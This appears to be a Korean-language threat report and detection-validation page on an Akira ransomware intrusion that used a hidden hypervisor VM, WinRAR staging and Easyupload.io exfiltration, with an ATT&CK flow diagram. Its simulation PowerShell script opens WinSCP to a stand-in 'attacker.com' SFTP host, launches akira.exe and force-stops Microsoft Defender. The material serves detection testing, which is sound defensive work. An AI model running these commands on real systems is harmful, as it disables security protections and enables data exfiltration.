팔로우 
요약
Akira 랜섬웨어 계열사가 하이퍼바이저에 무단으로 접근하여 은밀한 배치 환경으로 사용할 새 가상 머신을 생성했습니다. 공격자는 이 고립된 VM에 의존하여 보안 모니터링을 피하고, WinRAR로 데이터를 준비하며, Easyupload.io 파일 공유 플랫폼을 통해 아카이브를 유출하였습니다. 이 사건은 위협 행위자가 데이터 도난을 위해 합법적인 업로드 서비스를 계속 악용하는 방법을 보여줍니다.
조사
조사에는 EDR 원격 측정 데이터, Windows 이벤트 로그, Microsoft Edge 브라우징 기록을 결합하여 침입을 재구성했습니다. 분석가는 또한 범죄 가상 머신의 VHDX 이미지를 찾아내어, 공격자가 Microsoft Defender를 비활성화하고 Akira 랜섬웨어 작전을 설정한 사실을 밝혀냈습니다. VM의 법의학 검토를 통해 배치 및 유출 단계 동안 사용된 정확한 도구, 웹사이트 및 작업 흐름이 드러났습니다.
완화
조직은 새로운 또는 무단 엔드포인트와 가상 머신 인스턴스의 출현을 모니터링해야 합니다. 하이퍼바이저 및 도메인 컨트롤러와 같은 중요한 시스템에 대한 원격 액세스에 대한 강력한 가시성이 필수적입니다. 유출에 사용될 수 있는 알려진 파일 공유 및 빠른 업로드 서비스에 대한 액세스를 제한하거나 결정을 주의 깊게 모니터링하는 것도 중요합니다.
대응
무단 하이퍼바이저 액세스가 식별되면 즉시 영향을 받은 하이퍼바이저와 새로 생성된 가상 머신을 격리합니다. 데이터 배치 및 유출 범위를 파악하기 위해 VM 디스크 이미지에 대한 법의학 분석을 수행합니다. 액세스 로그를 검토하여 원래 진입점을 추적하고 지속적인 공격자 액세스가 남아 있지 않음을 확인합니다.
graph TB %% 클래스 정의 classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff6666 classDef defense fill:#ffcc00 %% 초기 접근 단계 action_access[“<b>행위</b> – <b>T1563.002 및 T1021</b><br/>원격 서비스 및 세션 하이재킹을 통한<br/>비인가 접근.<br/>대상: 도메인 컨트롤러 및 하이퍼바이저.”] class action_access action %% 정찰 단계 action_recon_ad[“<b>행위</b> – <b>T1087 및 T1681</b><br/>Active Directory 사용자 및 컴퓨터<br/>열거를 통한 정찰 수행.”] class action_recon_ad action action_recon_soft[“<b>행위</b> – <b>T1592.002</b><br/>호스트 소프트웨어 관련<br/>정보 탐색.”] class action_recon_soft action %% 방어 회피 및 준비 단계 action_hide_artifact[“<b>행위</b> – <b>T1564.006</b><br/>하이퍼바이저에서 새로운 가상 인스턴스를 실행하여<br/>보안 에이전트를 우회하기 위한<br/>아티팩트 은닉 수행.”] class action_hide_artifact action action_disable_defender[“<b>행위</b> – <b>T1685</b><br/>새로운 VM에서 Microsoft Defender를 비활성화하여<br/>방어 기능을 저하시킴.”] class action_disable_defender defense %% 측면 이동 및 데이터 수집 단계 action_lateral_move[“<b>행위</b> – <b>T1080</b><br/>조직의 파일 서버로<br/>측면 이동 수행.”] class action_lateral_move action tool_winrar[“<b>도구</b> – <b>이름</b>: WinRAR<br/><b>설명</b>: 공유 폴더 내의<br/>민감한 파일을 압축하는 데 사용.”] class tool_winrar tool action_collect_data[“<b>행위</b> – <b>T1560</b><br/>민감한 파일을 아카이브하여<br/>데이터 수집 수행.”] class action_collect_data action %% 유출 단계 action_stage_data[“<b>행위</b> – <b>T1074.002</b><br/>유출 전에 압축 파일을 임시 저장하는<br/>데이터 스테이징 수행.”] class action_stage_data action action_move_tools[“<b>행위</b> – <b>T1570</b><br/>공격 도구를 환경 내부로 이동하기 위한<br/>인바운드 도구 전송.”] class action_move_tools action tool_winscp[“<b>도구</b> – <b>이름</b>: WinSCP<br/><b>설명</b>: 데이터 전송에 사용.”] class tool_winscp tool tool_easyupload[“<b>도구</b> – <b>이름</b>: Easyupload.io / LimeWire<br/><b>설명</b>: 유출에 사용되는<br/>웹 기반 파일 전송 서비스.”] class tool_easyupload tool action_exfiltrate[“<b>행위</b> – <b>T1071.002 및 T1105</b><br/>웹 기반 서비스 및 파일 전송 프로토콜을 통한<br/>데이터 유출.”] class action_exfiltrate action %% 영향 단계 malware_akira[“<b>악성코드</b> – <b>이름</b>: Akira ransomware<br/><b>파일</b>: akira.exe<br/><b>설명</b>: 마운트된 네트워크 공유의<br/>파일을 암호화.”] class malware_akira malware action_impact[“<b>행위</b> – <b>T1486</b><br/>데이터 암호화를 통한<br/>영향 발생.”] class action_impact action %% 연결 흐름 action_access –>|이어짐| action_recon_ad action_access –>|이어짐| action_recon_soft action_recon_ad –>|이어짐| action_hide_artifact action_recon_soft –>|이어짐| action_hide_artifact action_hide_artifact –>|이어짐| action_disable_defender action_disable_defender –>|이어짐| action_lateral_move action_lateral_move –>|이어짐| action_collect_data action_collect_data –>|사용| tool_winrar action_collect_data –>|이어짐| action_stage_data action_stage_data –>|이어짐| action_move_tools action_move_tools –>|이어짐| action_exfiltrate action_exfiltrate –>|사용| tool_winscp action_exfiltrate –>|사용| tool_easyupload action_exfiltrate –>|이어짐| malware_akira malware_akira –>|결과| action_impact
공격 흐름
시뮬레이션 실행
전제 조건: 원격 측정 및 기준선 사전 점검이 통과되어야 합니다.
이유: 이 섹션은 탐지 규칙을 유발하기 위해 설계된 적대자 기술(TTP)의 정확한 실행을 자세히 설명합니다. 명령 및 설명은 발견된 TTP와 직접 연관되어 있으며 탐지 논리에 예상되는 정확한 원격 측정을 생성하기 위한 것이어야 합니다. 추상적이거나 관련 없는 예는 오진을 초래할 수 있습니다.
-
공격 서사 및 명령: 적이 초기 접근을 획득한 후 영향을 확대하려고 합니다. 처음에는
AdUsers.txt와 같은 알려진 텍스트 파일을 확인하여 민감한 파일을 열거합니다. 그 후 유출을 준비하기 위해WinRAR.exe를 사용하여 데이터를 압축합니다. 그런 다음 유출 도구인WinSCP.exe를 준비한 후akira.exe랜섬웨어 페이로드를 실행합니다. EDR/안티바이러스가 프로세스를 중단하지 못하도록Windefend서비스를 중단하려고 시도합니다. 이 특정 명령 줄 인수와 서비스 상태 변경 시퀀스는 Akira 전용 탐지 로그의 트리거를 의도하고 있습니다. -
회귀 테스트 스크립트:
# Akira 랜섬웨어 탐지 검증을 위한 시뮬레이션 스크립트 # 참고: 이 스크립트는 Defender 서비스를 중지하기 위해 관리자 권한이 필요합니다. Write-Host "[+] Akira 랜섬웨어 시뮬레이션 시작..." -ForegroundColor Cyan # 1. 발견/열거 시뮬레이션 (T1119) Write-Host "[+] 1단계: 메모장을 통해 파일 열거 시뮬레이션..." Start-Process notepad.exe -ArgumentList "AdUsers.txt" Start-Sleep -Seconds 2 # 2. 데이터 아카이빙 시뮬레이션 (T1560.003) # 참고: WinRAR이 존재한다고 가정하거나 명령 줄 활동을 시뮬레이션 Write-Host "[+] 2단계: WinRAR로 데이터 아카이빙 시뮬레이션..." Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt" Start-Sleep -Seconds 2 # 3. 유출 도구 준비 시뮬레이션 (T1105) Write-Host "[+] 3단계: 유출 도구 실행 시뮬레이션..." Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com" Start-Sleep -Seconds 2 # 4. 랜섬웨어 실행 시뮬레이션 (T1204.002) Write-Host "[+] 4단계: Akira 페이로드 실행 시뮬레이션..." Start-Process "akira.exe" Start-Sleep -Seconds 2 # 5. Defender 비활성화 시뮬레이션 (T1564.006) # 시스템 로그의 EventID 7036을 트리거 Write-Host "[+] 5단계: Microsoft Defender 중지 시도..." Stop-Service -Name "Windefend" -Force Write-Host "[+] 시뮬레이션 완료. SIEM에서 경고 확인." -ForegroundColor Green -
정리 명령:
# 정리 스크립트 Write-Host "[+] 시뮬레이션 아티팩트 정리 중..." -ForegroundColor Cyan # Defender 서비스 재시작 Start-Service -Name "Windefend" # 시뮬레이션된 파일 제거 Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue Write-Host "[+] 정리 완료." -ForegroundColor Green